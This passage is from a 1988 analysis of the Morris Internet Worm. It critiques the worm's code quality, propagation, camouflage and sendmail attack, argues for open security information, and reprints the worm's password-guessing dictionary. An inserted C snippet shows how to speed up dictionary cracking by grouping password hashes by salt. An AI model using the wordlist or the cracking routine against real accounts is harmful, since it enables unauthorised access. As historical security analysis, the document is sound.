1168. the author(s) been more experienced or less rushed in her/his
  1169. coding. However, it seems likely that this code had been
  1170. developed over a long period of time, so the only conclusion that
1171. can be drawn is that the author(s) was sloppy or careless (or
1172. both), and perhaps that the release of the worm was premature.
  1173. 6.2. Problems of Functionality
  1174. There is little argument that the program was functional. In
  1175. fact, we all wish it had been less capable! However, we are lucky
  1176. in the sense that the program had flaws that prevented it from
  1177. operating to the fullest. For instance, because of an error, the
  1178. code would fail to infect hosts on a local area network even
  1179. though it might identify such hosts. Another example of
  1180. restricted functionality concerns the gathering of hostnames to
  1181. infect. As noted already, the code failed to gather host names
1182. from user .rhosts files early on. It also did not attempt to
  1183. collect host names from other user and system files containing
1184. such names (e.g., /etc/hosts.lpd). Many of the operations could
  1185. have been done ``smarter.'' The case of using linear structures
  1186. has already been mentioned. Another example would have been to
  1187. sort user passwords by the salt used. If the same salt was
  1188. present in more than one password, then all those passwords could
  1189. be checked in parallel as a single pass was made through the
1190. dictionaries. On our machine, for instance, 5% of the 200
1191. passwords share the same salts.
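A minimal sketch of this salt-grouping idea follows; the password
array and its fields are hypothetical, and the accounts are assumed
to be pre-sorted so that equal salts are adjacent:

    #include <string.h>

    extern char *crypt(const char *key, const char *salt);

    struct pwent { char salt[3]; char encrypted[14]; };

    /* Check one dictionary word against every account, calling
     * crypt only once per distinct salt. */
    int check_word(struct pwent *pwlist, int n, const char *word) {
        int i = 0, j, hits = 0;

        while (i < n) {
            char *e = crypt(word, pwlist[i].salt);  /* one encryption */
            for (j = i; j < n &&
                 strcmp(pwlist[j].salt, pwlist[i].salt) == 0; j++)
                if (strcmp(e, pwlist[j].encrypted) == 0)
                    hits++;                         /* many compares */
            i = j;                                  /* next group */
        }
        return hits;
    }

No special advantage was taken if the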
  1192. root password was compromised. Once the root password has been
  1193. broken, it is possible to fork children that set their uid and
  1194. environment variables to match each designated user. These
  1195. processes could then attempt the rsh attack described earlier in
  1196. this report. Instead, root is treated as any other account. It
  1197. has been suggested to me that this treatment of root may have
1198. been a conscious choice of the worm author(s). Without knowing
  1199. the true motivation of the author, this is impossible to decide.
  1200. However, considering the design and intent of the program, I find
  1201. it difficult to believe that such exploitation would have been
  1202. omitted if the author had thought of it. The same attack used on
  1203. the finger daemon could have been extended to the Sun version of
  1204. the program, but was not. The only explanations that come to mind
  1205. why this was not done are that the author lacked the motivation,
  1206. the ability, the time, or the resources to develop a version for
  1207. the Sun. However, at a recent meeting, Professor Rick Rashid of
  1208. Carnegie-Mellon University was heard to claim that Robert T.
  1209. Morris, the alleged author of the worm, had revealed the fingerd
  1210. bug to system administrative staff at CMU well over a year ago.
  1211. 15
  1212. Assuming this report is correct and the worm author is indeed Mr.
  1213. Morris, it is obvious that there was sufficient time to construct
  1214. a Sun version of the code. In fact, I asked three Purdue graduate
1215. students (Shawn D. Ostermann, Steve J. Chapin, and Jim N.
1216. Griffioen) to develop a Sun 3 version of the attack, and they did
  1217. so in under three hours. The Worm author certainly must have had
  1218. access to Suns or else he would not have been able to provide Sun
  1219. binaries to accompany the operational worm. Motivation should
  1220. also not be a factor considering everything else present in the
  1221. program. With time and resources available, the only reason I
  1222. cannot immediately rule out is that he lacked the knowledge of
1223. how to implement a Sun version of the attack. This seems unlikely,
  1224. but given the inconsistent nature of the rest of the code, it is
  1225. certainly a possibility. However, if this is the case, it raises
  1226. a new question: was the author of the Worm the original author of
  1227. the VAX fingerd attack? Perhaps the most obvious shortcoming of
  1228. the code is the lack of understanding about propagation and load.
  1229. The reason the worm was spotted so quickly and caused so much
  1230. disruption was because it replicated itself exponentially on some
  1231. networks, and because each worm carried no history with it.
  1232. Admittedly, there was a check in place to see if the current
  1233. machine was already infected, but one out of every seven worms
  1234. would never die even if there was an existing infestation.
  1235. Furthermore, worms marked for self-destruction would continue to
  1236. execute up to the point of having made at least one complete pass
  1237. through the password file. Many approaches could have been taken
1238. by the author(s) to slow the growth of the worm or prevent
  1239. reinfestation; little is to be gained from explaining them here,
  1240. but their absence from the worm program is telling. Either the
1241. author(s) did not have any understanding of how the program
  1242. would propagate, or else she/he/they did not care; the existence
  1243. in the Worm of mechanisms to limit growth tends to indicate that
  1244. it was a lack of understanding rather than indifference. Some of
  1245. the algorithms used by the Worm were reasonably clever. One in
  1246. particular is interesting to note: when trying passwords from the
  1247. built-in list, or when trying to break into connected hosts, the
  1248. worm would randomize the list of candidates for trial. Thus, if
  1249. more than one worm were present on the local machine, they would
  1250. be more likely to try candidates in a different order, thus
1251. maximizing their coverage. This implies, however (as does the
1252. action of the pleasequit variable), that the author(s) was not
  1253. overly concerned with the presence of multiple worms on the same
  1254. machine. More to the point, multiple worms were allowed for a
  1255. while in an effort to maximize the spread of the infection. This
  1256. also supports the contention that the author did not understand
  1257. the propagation or load effects of the Worm. The design of the
  1258. vector program, the ``thinning'' protocol, and the use of the
  1259. internal state machine were all clever and non-obvious. The
  1260. overall structure of the program, especially the code associated
  1261. with IP addresses, indicates considerable knowledge of networking
  1262. and the routines available to support it. The knowledge evidenced
  1263. by that code would indicate extensive experience with networking
1264. facilities. This, coupled with some of the errors in the Worm
1265. code related to networking, further supports the thesis that the
1266. author was not a careful programmer -- the errors in those parts
1267. of the code were probably not the result of ignorance or
1268. inexperience.
  1269. 6.3. Camouflage
  1270. Great care was taken to prevent the worm program from being
  1271. stopped. This can be seen by the caution with which new files
  1272. were introduced into a machine, including the use of random
  1273. challenges. It can be seen by the fact that every string compiled
  1274. into the worm was encrypted to prevent simple examination. It was
  1275. evidenced by the care with which files associated with the worm
  1276. were deleted from disk at the earliest opportunity, and the
  1277. corresponding contents were encrypted in memory when loaded. It
  1278. was evidenced by the continual forking of the process, and the
1279. (faulty) check for other instances of the worm on the local
  1280. host. The code also evidences precautions against providing
  1281. copies of itself to anyone seeking to stop the worm. It sets its
  1282. resource limits so it cannot dump a core file, and it keeps
  1283. internal data encrypted until used. Luckily, there are other
  1284. methods of obtaining core files and data images, and researchers
  1285. were able to obtain all the information they needed to
  1286. disassemble and reverse-engineer the code. There is no doubt,
1287. however, that the author(s) of the worm intended to make such a
  1288. task as difficult as possible.
  1289. 6.4. Specific Comments
  1290. Some more specific comments are worth making. These are directed
  1291. to particular aspects of the code rather than the program as a
  1292. whole.
  1293. 6.4.1. The sendmail attack
  1294. Many sites tend to experience substantial loads because of heavy
  1295. mail traffic. This is especially true at sites with mailing list
  1296. exploders. Thus, the administrators at those sites have
  1297. configured their mailers to queue incoming mail and process the
  1298. queue periodically. The usual configuration is to set sendmail to
  1299. run the queue every 30 to 90 minutes. The attack through sendmail
  1300. would fail on these machines unless the vector program were
  1301. delivered into a nearly empty queue within 120 seconds of it
  1302. being processed. The reason for this is that the infecting worm
  1303. would only wait on the server socket for two minutes after
  1304. delivering the ``infecting mail.'' Thus, on systems with delayed
  1305. queues, the vector process would not get built in time to
  1306. transfer the main worm program over to the target. The vector
  1307. process would fail in its connection attempt and exit with a
  1308. non-zero status. Additionally, the attack through sendmail
  1309. invoked the vector program without a specific path. That is, the
  1310. program was invoked with ``foo'' instead of ``./foo'' as was done
  1311. with the shell-based attack. As a result, on systems where the
  1312. default path used by sendmail's shell did not contain the current
1313. directory (``.''), the invocation of the code would fail. It
  1314. should be noted that such a failure interrupts the processing of
1315. subsequent commands (such as the rm of the files), and this may
  1316. be why many system administrators discovered copies of the vector
  1317. program source code in their /usr/tmp directories.
  1318. 6.4.2. The machines involved
  1319. As has already been noted, this attack was made only on Sun 3
  1320. machines and VAX machines running BSD UNIX. It has been observed
  1321. in at least one mailing list that had the Sun code been compiled
  1322. with the -mc68010 flag, more Sun machines would have fallen
  1323. victim to the worm. It is a matter of some curiosity why more
  1324. machines were not targeted for this attack. In particular, there
  1325. are many Pyramid, Sequent, Gould, Sun 4, and Sun i386 machines on
  1326. the net.
  1327. 16
  1328. If binary files for those had also been included, the worm could
  1329. have spread much further. As it was, some locations such as Ohio
  1330. State were completely spared the effects of the worm because all
  1331. their ``known'' machines were of a type that the worm could not
  1332. infect. Since the author of the program knew how to break into
  1333. arbitrary UNIX machines, it seems odd that he/she did not attempt
  1334. to compile the program on foreign architectures to include with
  1335. the worm.
  1336. 6.4.3. Portability considerations
1337. The author(s) of the worm may not have had much experience with
  1338. writing portable UNIX code, including shell scripts. Consider
  1339. that in the shell script used to compile the vector, the
1340. following command is used: ``if [ -f sh ]''. The use of the [
  1341. character as a synonym for the test function is not universal.
  1342. UNIX users with experience writing portable shell files tend to
1343. spell out the operator test rather than rely on there being a link
  1344. to a file named ``['' on any particular system. They also know
1345. that the test operator is built into many shells and thus faster
  1346. than the external [ variant. The test invocation used in the worm
  1347. code also uses the -f flag to test for presence of the file named
  1348. sh. This provided us with the worm ``condom'' published Thursday
  1349. night:
  1350. 17
  1351. creating a directory with the name sh in /usr/tmp causes this
  1352. test to fail, as do later attempts to create executable files by
  1353. that name. Experienced shell programmers tend to use the -e
1354. (exists) flag in circumstances such as this, to detect not only
  1355. directories, but sockets, devices, named FIFOs, etc. Other
  1356. colloquialisms are present in the code that bespeak a lack of
  1357. experience writing portable code. One such example is the code
  1358. loop where file units are closed just after the vector program
  1359. starts executing, and again in the main program just after it
  1360. starts executing. In both programs, code such as the following is
1361. executed: for (i = 0; i < 32; i++) close(i); The portable way
1362. to accomplish the task of closing all file descriptors (on
1363. Berkeley-derived systems) is to execute: for (i = 0; i <
1364. getdtablesize(); i++) close(i); or the even more efficient
1365. for (i = getdtablesize()-1; i >= 0; i--) close(i); This is
1366. because the number of file units available (and thus open) may
1367. vary from system to system.
  1368. 6.5. Summary
  1369. Many other examples can be drawn from the code, but the points
  1370. should be obvious by now: the author of the worm program may have
  1371. been a moderately experienced UNIX programmer, but s/he was by no
  1372. means the ``UNIX Wizard'' many have been claiming. The code
  1373. employs a few clever techniques and tricks, but there is some
  1374. doubt if they are all the original work of the Worm author. The
  1375. code seems to be the product of an inexperienced or sloppy
1376. programmer. The person (or persons) who put this program
  1377. together appears to lack fundamental insight into some
  1378. algorithms, data structures, and network propagation, but at the
  1379. same time has some very sophisticated knowledge of network
  1380. features and facilities. The code does not appear to have been
1381. tested (although anything other than unit testing would not be
1382. simple to do), or else it was prematurely released. Actually, it
  1383. is possible that both of these conclusions are correct. The
  1384. presence of so much dead and duplicated code coupled with the
1385. size of some data structures (such as the 20-slot object code
1386. array) argues that the program was intended to be more
  1387. comprehensive.
  1388. 7. Conclusions
  1389. It is clear from the code that the worm was deliberately designed
  1390. to do two things: infect as many machines as possible, and be
1391. difficult to track and stop. There can be no claim that this
1392. was in any way an accident, although its release may have been
  1393. premature. It is still unknown if this worm, or a future version
  1394. of it, was to accomplish any other tasks. Although an author has
1395. been alleged (Robert T. Morris), he has not publicly confessed
  1396. nor has the matter been definitively proven. Considering the
  1397. probability of both civil and criminal legal actions, a
  1398. confession and an explanation are unlikely to be forthcoming any
  1399. time soon. Speculation has centered on motivations as diverse as
  1400. revenge, pure intellectual curiosity, and a desire to impress
  1401. someone. This must remain speculation for the time being,
  1402. however, since we do not have access to a definitive statement
1403. from the author(s). At the least, there must be some question
  1404. about the psychological makeup of someone who would build and run
  1405. such software.
  1406. 18
  1407. Many people have stated that the authors of this code
  1408. 19
  1409. must have been ``computer geniuses'' of some sort. I have been
  1410. bothered by that supposition since first hearing it, and after
  1411. having examined the code in some depth, I am convinced that this
  1412. program is not evidence to support any such claim. The code was
  1413. apparently unfinished and done by someone clever but not
  1414. particularly gifted, at least in the way we usually associate
  1415. with talented programmers and designers. There were many bugs and
  1416. mistakes in the code that would not be made by a careful,
  1417. competent programmer. The code does not evidence clear
  1418. understanding of good data structuring, algorithms, or even of
  1419. security flaws in UNIX. It does contain clever exploitations of
  1420. two specific flaws in system utilities, but that is hardly
  1421. evidence of genius. In general, the code is not that impressive,
  1422. and its ``success'' was probably due to a large amount of luck
  1423. rather than any programming skill possessed by the author. Chance
  1424. favored most of us, however. The effects of this worm were
1425. (largely) benign, and it was easily stopped. Had the code been
  1426. tested and developed further by someone more experienced, or had
  1427. it been coupled with something destructive, the toll would have
  1428. been considerably higher. I can easily think of several dozen
  1429. people who could have written this program, and not only done it
1430. with far fewer (if any) errors, but made it considerably more
  1431. virulent. Thankfully, those individuals are all responsible,
  1432. dedicated professionals who would not consider such an act. What
  1433. we learn from this about securing our systems will help determine
  1434. if this is the only such incident we ever need to analyze. This
  1435. attack should also point out that we need a better mechanism in
  1436. place to coordinate information about security flaws and attacks.
  1437. The response to this incident was largely ad hoc, and resulted in
  1438. both duplication of effort and a failure to disseminate valuable
  1439. information to sites that needed it. Many site administrators
  1440. discovered the problem from reading the newspaper or watching the
  1441. television. The major sources of information for many of the
1442. sites affected seem to have been Usenet news groups and a
  1443. mailing list I put together when the worm was first discovered.
  1444. Although useful, these methods did not ensure timely, widespread
1445. dissemination of useful information -- especially since they
  1446. depended on the Internet to work! Over three weeks after this
  1447. incident some sites are still not reconnected to the Internet.
  1448. This is the second time in six months that a major panic has hit
1449. the Internet community. The first occurred in May when a rumor
  1450. swept the community that a ``logic bomb'' had been planted in Sun
  1451. software by a disgruntled employee. Many, many sites turned their
1452. system clocks back or shut off their systems to prevent
  1453. damage. The personnel at Sun Microsystems responded to this in an
  1454. admirable fashion, conducting in-house testing to isolate any
  1455. such threat, and issuing information to the community about how
  1456. to deal with the situation. Unfortunately, almost everyone else
  1457. seems to have watched events unfold, glad that they were not the
  1458. ones who had to deal with the situation. The worm has shown us
  1459. that we are all affected by events in our shared environment, and
  1460. we need to develop better information methods outside the network
  1461. before the next crisis. This whole episode should cause us to
  1462. think about the ethics and laws concerning access to computers.
  1463. The technology we use has developed so quickly it is not always
  1464. simple to determine where the proper boundaries of moral action
  1465. may be. Many senior computer professionals started their careers
  1466. years ago by breaking into computer systems at their colleges and
  1467. places of employment to demonstrate their expertise. However,
  1468. times have changed and mastery of computer science and computer
  1469. engineering now involves a great deal more than can be shown by
  1470. using intimate knowledge of the flaws in a particular operating
  1471. system. Entire businesses are now dependent, wisely or not, on
  1472. computer systems. People's money, careers, and possibly even
  1473. their lives may be dependent on the undisturbed functioning of
  1474. computers. As a society, we cannot afford the consequences of
  1475. condoning or encouraging behavior that threatens or damages
  1476. computer systems. As professionals, computer scientists and
  1477. computer engineers cannot afford to tolerate the romanticization
  1478. of computer vandals and computer criminals. This incident should
  1479. also prompt some discussion about distribution of security-
  1480. related information. In particular, since hundreds of sites have
  1481. ``captured'' the binary form of the worm, and since personnel at
  1482. those sites have utilities and knowledge that enables them to
  1483. reverse-engineer the worm code, we should ask how long we expect
1484. it to be beneficial to keep the code unpublished. As I mentioned
  1485. in the introduction, at least five independent groups have
  1486. produced reverse-engineered versions of the worm, and I expect
  1487. many more have been done or will be attempted, especially if the
  1488. current versions are kept private. Even if none of these versions
  1489. is published in any formal way, hundreds of individuals will have
  1490. had access to a copy before the end of the year. Historically,
  1491. trying to ensure security of software through secrecy has proven
  1492. to be ineffective in the long term. It is vital that we educate
  1493. system administrators and make bug fixes available to them in
  1494. some way that does not compromise their security. Methods that
  1495. prevent the dissemination of information appear to be completely
  1496. contrary to that goal. Last, it is important to note that the
  1497. nature of both the Internet and UNIX helped to defeat the worm as
  1498. well as spread it. The immediacy of communication, the ability to
  1499. copy source and binary files from machine to machine, and the
  1500. widespread availability of both source and expertise allowed
  1501. personnel throughout the country to work together to solve the
  1502. infection even despite the widespread disconnection of parts of
  1503. the network. Although the immediate reaction of some people might
  1504. be to restrict communication or promote a diversity of
  1505. incompatible software options to prevent a recurrence of a worm,
  1506. that would be entirely the wrong reaction. Increasing the
  1507. obstacles to open communication or decreasing the number of
  1508. people with access to in-depth information will not prevent a
1509. determined attacker -- it will only decrease the pool of
  1510. expertise and resources available to fight such an attack.
  1511. Further, such an attitude would be contrary to the whole purpose
  1512. of having an open, research-oriented network. The Worm was caused
1513. by a breakdown of ethics as well as lapses in security -- a
  1514. purely technological attempt at prevention will not address the
  1515. full problem, and may just cause new difficulties.
  1516. Acknowledgments
  1517. Much of this analysis was performed on reverse-engineered
  1518. versions of the worm code. The following people were involved in
  1519. the production of those versions: Donald J. Becker of Harris
  1520. Corporation, Keith Bostic of Berkeley, Donn Seeley of the
  1521. University of Utah, Chris Torek of the University of Maryland,
  1522. Dave Pare of FX Development, and the team at MIT: Mark W. Eichin,
  1523. Stanley R. Zanarotti, Bill Sommerfeld, Ted Y. Ts'o, Jon Rochlis,
  1524. Ken Raeburn, Hal Birkeland and John T. Kohl. A disassembled
  1525. version of the worm code was provided at Purdue by staff of the
  1526. Purdue University Computing Center, Rich Kulawiec in particular.
  1527. Thanks to the individuals who reviewed early drafts of this paper
  1528. and contributed their advice and expertise: Don Becker, Kathy
  1529. Heaphy, Brian Kantor, R. J. Martin, Richard DeMillo, and
  1530. especially Keith Bostic and Steve Bellovin. My thanks to all
  1531. these individuals. My thanks and apologies to anyone who should
  1532. have been credited and was not.
  1533. References
  1534. Allm83. Allman, Eric,
1535. Sendmail -- An Internetwork Mail Router,
  1536. University of California, Berkeley, 1983. Issued with the BSD
  1537. UNIX documentation set.
  1538. Brun75. Brunner, John, The Shockwave Rider, Harper & Row, 1975.
  1539. Cohe84. Cohen, Fred, ``Computer Viruses: Theory and
  1540. Experiments,'' PROCEEDINGS OF THE 7TH NATIONAL COMPUTER SECURITY
  1541. CONFERENCE, pp. 240-263, 1984.
  1542. Denn88. Denning, Peter J., ``Computer Viruses,'' AMERICAN
  1543. SCIENTIST, vol. 76, pp. 236-238, May-June 1988.
  1544. Dewd85. Dewdney, A. K., ``A Core War Bestiary of viruses, worms,
  1545. and other threats to computer memories,'' SCIENTIFIC AMERICAN,
  1546. vol. 252, no. 3, pp. 14-23, May 1985.
1547. Gerr72. Gerrold, David, When Harlie Was One, Ballantine Books,
  1548. 1972. The first edition.
  1549. Gram84. Grampp, Fred. T. and Robert H. Morris, ``UNIX Operating
  1550. System Security,''
  1551. AT&T BELL LABORATORIES TECHNICAL JOURNAL, vol. 63, no. 8, part 2,
  1552. pp. 1649-1672, Oct. 1984.
  1553. Harr77. Harrenstien, K., ``Name/Finger,'' RFC 742, SRI Network
  1554. Information Center, December 1977.
  1555. Morr79. Morris, Robert and Ken Thompson, ``UNIX Password
  1556. Security,'' COMMUNICATIONS OF THE ACM, vol. 22, no. 11, pp. 594-
  1557. 597, ACM, November 1979.
  1558. Post82. Postel, Jonathan B., ``Simple Mail Transfer Protocol,''
  1559. RFC 821, SRI Network Information Center, August 1982.
  1560. Reid87. Reid, Brian, ``Reflections on Some Recent Widespread
  1561. Computer Breakins,'' COMMUNICATIONS OF THE ACM, vol. 30, no. 2,
  1562. pp. 103-105, ACM, February 1987.
1563. Ritc79. Ritchie, Dennis M., ``On the Security of UNIX,'' in UNIX
1564. SUPPLEMENTARY DOCUMENTS, AT&T, 1979.
1565. Seel88. Seeley, Donn, ``A Tour of the Worm,'' TECHNICAL REPORT,
1566. Computer Science Dept., University of Utah, November 1988.
1567. Unpublished report.
1568. Shoc82. Shoch, John F. and Jon A. Hupp, ``The Worm Programs --
  1569. Early Experience with a Distributed Computation,'' COMMUNICATIONS
  1570. OF THE ACM, vol. 25, no. 3, pp. 172-180, ACM, March 1982.
  1571. Appendix A The Dictionary
  1572. What follows is the mini-dictionary of words contained in the
  1573. worm. These were tried when attempting to break user passwords.
1574. Looking through this list is, in some sense, revealing, but
  1575. actually raises a significant question: how was this list chosen?
  1576. The assumption has been expressed by many people that this list
  1577. represents words commonly used as passwords; this seems unlikely.
  1578. Common choices for passwords usually include fantasy characters,
1579. but this list contains none of the likely choices (e.g.,
1580. ``hobbit,'' ``dwarf,'' ``gandalf,'' ``skywalker,'' ``conan'').
  1581. Names of relatives and friends are often used, and we see women's
  1582. names like ``jessica,'' ``caroline,'' and ``edwina,'' but no
  1583. instance of the common names ``jennifer'' or ``kathy.'' Further,
  1584. there are almost no men's names such as ``thomas'' or either of
1585. ``stephen'' or ``steven'' (or ``eugene''!). Additionally, none
  1586. of these have the initial letters capitalized, although that is
  1587. often how they are used in passwords. Also of interest, there are
  1588. no obscene words in this dictionary, yet many reports of
  1589. concerted password cracking experiments have revealed that there
1590. are a significant number of users who use such words (or
1591. phrases) as passwords. The list contains at least one incorrect
  1592. spelling: ``commrades'' instead of ``comrades''; I also believe
  1593. that ``markus'' is a misspelling of ``marcus.'' Some of the words
  1594. do not appear in standard dictionaries and are non-English names:
  1595. ``jixian,'' ``vasant,'' ``puneet,'' etc. There are also some
  1596. unusual words in this list that I would not expect to be
  1597. considered common: ``anthropogenic,'' ``imbroglio,'' ``umesh,''
  1598. ``rochester,'' ``fungible,'' ``cerulean,'' etc. I imagine that
  1599. this list was derived from some data gathering with a limited set
1600. of passwords, probably in some known (to the author) computing
  1601. environment. That is, some dictionary-based or brute-force attack
  1602. was used to crack a selection of a few hundred passwords taken
1603. from a small set of machines. Other approaches to gathering
1604. passwords could also have been used -- Ethernet monitors, Trojan
  1605. Horse login programs, etc. However they may have been cracked,
  1606. the ones that were broken would then have been added to this
  1607. dictionary. Interestingly enough, many of these words are not in
1608. the standard on-line dictionary (in /usr/dict/words). As such,
  1609. these words are useful as a supplement to the main dictionary-
  1610. based attack the worm used as strategy #4, but I would suspect
  1611. them to be of limited use before that time. This unusual
  1612. composition might be useful in the determination of the
1613. author(s) of this code. One approach would be to find a system
  1614. with a user or local dictionary containing these words. Another
1615. would be to find some system(s) where a significant quantity of
  1616. passwords could be broken with this list. aaa academia aerobics
  1617. airplane albany albatross albert alex alexander algebra aliases
  1618. alphabet ama amorphous analog anchor andromache animals answer
  1619. anthropogenic anvils anything aria ariadne arrow arthur athena
  1620. atmosphere aztecs azure bacchus bailey banana bananas bandit
  1621. banks barber baritone bass bassoon batman beater beauty beethoven
  1622. beloved benz beowulf berkeley berliner beryl beverly bicameral
  1623. bob brenda brian bridget broadway bumbling burgess campanile
  1624. cantor cardinal carmen carolina caroline cascades castle cat
  1625. cayuga celtics cerulean change charles charming charon chester
  1626. cigar classic clusters coffee coke collins commrades computer
  1627. condo cookie cooper cornelius couscous creation creosote cretin
  1628. daemon dancer daniel danny dave december defoe deluge desperate
  1629. develop dieter digital discovery disney dog drought duncan eager
  1630. easier edges edinburgh edwin edwina egghead eiderdown eileen
1631. einstein elephant elizabeth ellen emerald engine engineer
  1632. enterprise enzyme ersatz establish estate euclid evelyn extension
  1633. fairway felicia fender fermat fidelity finite fishers flakes
  1634. float flower flowers foolproof football foresight format forsythe
  1635. fourier fred friend frighten fun fungible gabriel gardner
  1636. garfield gauss george gertrude ginger glacier gnu golfer gorgeous
1637. gorges gosling gouge graham gryphon guest guitar gumption guntis
  1638. hacker hamlet handily happening harmony harold harvey hebrides
  1639. heinlein hello help herbert hiawatha hibernia honey horse horus
  1640. hutchins imbroglio imperial include ingres inna innocuous
  1641. irishman isis japan jessica jester jixian johnny joseph joshua
  1642. judith juggle julia kathleen kermit kernel kirkland knight ladle
1643. lambda lamination larkin larry lazarus lebesgue lee leland leroy
  1644. lewis light lisa louis lynne macintosh mack maggot magic malcolm
  1645. mark markus marty marvin master maurice mellon merlin mets
  1646. michael michelle mike minimum minsky moguls moose morley mozart
  1647. nancy napoleon nepenthe ness network newton next noxious
  1648. nutrition nyquist oceanography ocelot olivetti olivia oracle orca
1649. orwell osiris outlaw oxford pacific painless pakistan pam papers
  1650. password patricia penguin peoria percolate persimmon persona pete
  1651. peter philip phoenix pierre pizza plover plymouth polynomial
  1652. pondering pork poster praise precious prelude prince princeton
  1653. protect protozoa pumpkin puneet puppet rabbit rachmaninoff
  1654. rainbow raindrop raleigh random rascal really rebecca remote rick
1655. ripple robotics rochester rolex romano ronald rosebud rosemary
  1656. roses ruben rules ruth sal saxon scamper scheme scott scotty
  1657. secret sensor serenity sharks sharon sheffield sheldon shiva
  1658. shivers shuttle signature simon simple singer single smile smiles
  1659. smooch smother snatch snoopy soap socrates sossina sparrows spit
  1660. spring springer squires strangle stratford stuttgart subway
1661. success summer super superstage support supported surfer suzanne
  1662. swearer symmetry tangerine tape target tarragon taylor telephone
  1663. temptation thailand tiger toggle tomato topography tortoise
  1664. toyota trails trivial trombone tubas tuttle umesh unhappy unicorn
  1665. unknown urchin utility vasant vertigo vicky village virginia
  1666. warren water weenie whatnot whiting whitney will william
1667. williamsburg willie winston wisconsin wizard wombat woodwind
  1668. wormwood yacov yang yellowstone yosemite zap zimmerman
  1669. Appendix B The Vector Program
  1670. The worm was brought over to each machine it infected via the
  1671. actions of a small program I call the vector program. Other
  1672. individuals have been referring to this as the grappling hook
1673. program. Some people have referred to it as the l1.c program, since
1674. that is the suffix used on each copy. The source for this program
  1675. would be transferred to the victim machine using one of the
  1676. methods discussed in the paper. It would then be compiled and
  1677. invoked on the victim machine with three command line arguments:
  1678. the canonical IP address of the infecting machine, the number of
  1679. the TCP port to connect to on that machine to get copies of the
  1680. main worm files, and a magic number that effectively acted as a
  1681. one-time-challenge password. If the ``server'' worm on the remote
  1682. host and port did not receive the same magic number back before
  1683. starting the transfer, it would immedi- ately disconnect from the
  1684. vector program. This can only have been to prevent some- one from
  1685. attempting to ``capture'' the binary files by spoofing a worm
  1686. ``server.'' This code also goes to some effort to hide itself,
  1687. both by zeroing out the argu- ment vector, and by immediately
  1688. forking a copy of itself. If a failure occurred in transferring a
  1689. file, the code deleted all files it had already transferred, then
  1690. it exited. One other key item to note in this code is that the
  1691. vector was designed to be able to transfer up to 20 files; it was
  1692. used with only three. This can only make one wonder if a more
  1693. extensive version of the worm was planned for a later date, and
  1694. if that version might have carried with it other command files,
  1695. password data, or possibly local virus or trojan horse programs.
  1696. <<what follows is a pair of programs that I was unable to decode
  1697. with any dependability>>
1698. Notes:
  1699. BSD is an acronym for Berkeley Software Distribution.
  1700. UNIX is a registered trademark of AT&T Laboratories.
  1701. VAX is a trademark of Digital Equipment Corporation.
  1702. The second edition of the book, just published, has been
  1703. ``updated'' to omit this subplot about VIRUS.
  1705. 5
  1706. It is probably a coincidence that the Internet Worm was loosed on
  1707. November 2, the eve of this ``birthday.''
  1708. 6
  1709. Note that a widely used alternative to sendmail, MMDF, is also
  1710. viewed as too complex and large by many users. Further, it is
  1711. not perceived to be as flexible as sendmail if it is necessary
  1712. to establish special addressing and handling rules when bridging
  1713. heterogeneous networks.
  1714. 7
  1715. Strictly speaking, the password is not encrypted. A block of zero
  1716. bits is repeatedly encrypted using the user password, and the
1717. results of this encryption are what is saved. See [Morr79] for
  1718. more details.
  1719. 8
  1720. Such a list would likely include all words in the dictionary, the
  1721. reverse of all such words, and a large collection of proper
  1722. names.
  1723. 8
  1724. rexec is a remote command execution service. It requires that a
  1725. username/password combination be supplied as part of the
  1726. request.
  1727. 9
1728. This was compiled in as port number 23357, on host 127.0.0.1 (loopback).
  1729. 10
  1730. Using TCP port 11357 on host 128.32.137.13.
  1731. 11
  1732. Interestingly, although the program was coded to get the address
  1733. of the host on the remote end of point-to-point links, no use
  1734. seems to have been made of that information.
  1735. 12
  1736. As if some of them aren't suspicious enough!
  1737. 13
  1738. This appears to be a bug. The probable assumption was that the
  1739. routine hl would handle infection of local hosts, but hl calls
  1740. this routine! Thus, local hosts were never infected via this
  1741. route.
  1742. 14
  1743. This is puzzling. The appropriate file to scan for equivalent
  1744. hosts would have been the .rhosts file, not the .forward file.
  1745. 15
  1746. Private communication from someone present at the meeting.
  1747. 16
1748. The thought of a Sequent Symmetry or Gould NP1 infected with
1749. multiple copies of the worm is an awesome (and awful)
  1750. thought. The effects noticed locally when the worm broke into a
1751. mostly unloaded VAX 8800 were spectacular. The effect on a
  1752. machine with one or two orders of magnitude more capacity is a
  1753. frightening thought.
  1754. 17
  1755. Developed by Kevin Braunsdorf and Rich Kulawiec at Purdue PUCC.
  1756. 18
  1757. Rick Adams, of the Center for Seismic Studies, has commented that
  1758. we may someday hear that the worm was loosed to impress Jodie
  1759. Foster. Without further information, this is as valid a
  1760. speculation as any other, and should raise further disturbing
  1761. questions; not everyone with access to computers is rational and
  1762. sane, and future attacks may reflect this.
  1763. 19
1764. Throughout this paper I have been writing author(s) instead of
  1765. author. It occurs to me that most of the mail, Usenet postings,
  1766. and media coverage of this incident have assumed that it was
1767. author (singular). Are we so unaccustomed to working together
  1768. on programs that this is our natural inclination? Or is it that
  1769. we find it hard to believe that more than one individual could
1770. have such poor judgement? I also noted that most of the people I
  1771. spoke with seemed to assume that the worm author was male. I
  1772. leave it to others to speculate on the value, if any, of these
  1773. observations.
